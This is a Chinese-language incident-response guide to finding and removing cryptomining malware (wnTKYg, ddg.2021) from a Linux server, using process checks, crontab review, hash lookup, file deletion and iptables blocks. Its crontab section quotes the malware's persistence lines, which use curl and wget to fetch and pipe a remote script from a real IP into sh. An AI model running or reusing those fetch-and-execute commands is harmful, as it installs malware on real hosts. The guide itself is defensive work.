挖礦病毒排查

一 異常進程排查

一、# 進程動態快速定位，使用 top -c可快速定位異常常常的物理位置，查詢異常進程。
二、# top -c
三、# ps -ef 排查
四、# ps -ef |grep wnTKYg
五、# ps -ef |grep ddg.2021
六、# 疑似進程定位
七、[root@localhost ~]# find / -name wnTKYg*
      /tmp/wnTKYg

二 計劃任務查詢

一、[root@localhost ~]# crontab -l

1. /5 * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh

2. /5 * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

三 異常病毒校驗

一、# md5sum wnTKYg

d3b1700a413924743caab1460129396b wnTKYg

二、進行疑似病毒MD5哈希值的校驗比對

直接將疑似文件wnTKYg的md5哈希值複製到病毒校驗網站https://www.virustotal.com/#search進行查詢比對。經過比對結果，咱們能夠確認疑似文件是不是惡意程序。

四  處理惡意程序

一、清除計劃任務

# crontab -r # 直接使用此命令便可上次當前用戶的計劃任務

或者 [root@VM_11_13_centos ~]# cd /var/spool/cron/
        [root@VM_11_13_centos cron]# vim root  而後刪除計劃任務。

# crontab -l # 直接查詢當前用戶是否還存在計劃任務

二、#pkill wnTKYg

     # pkill dgg.2021

三、清除惡意進程

# rm -rf /tmp/ddg.2021

# rm -rf /tmp/wnTKYg

# rm -rf /tmp/i.sh

五 下發訪問控制策略，禁止服務互聯三個惡意程序外聯的外網地址

一、查詢惡意進程外網互聯地址

 # netstat -pantul |grep ESTAB
 tcp 0 0 192.168.31.9:22 192.168.31.75:3898 ESTABLISHED 3742/sshd
 tcp 0 0 192.168.31.9:56842 163.172.226.120:443 ESTABLISHED 7263/wnTKYg
 tcp 0 0 192.168.31.9:22 192.168.31.75:3953 ESTABLISHED 3795/sshd
 tcp 0 0 192.168.31.9:35286 104.131.231.181:8443 ESTABLISHED 7193/ddg.2021
 tcp 0 0 192.168.31.9:55200 218.248.40.228:8443 ESTABLISHED 6339/curl

二、下發放控制策略，禁止服務的外網互聯

# iptables -A OUTPUT -d 163.172.226.120 -j DROP

# iptables -A OUTPUT -d 104.131.231.181 -j DROP# iptables -A OUTPUT -d 218.248.40.228 -j DROP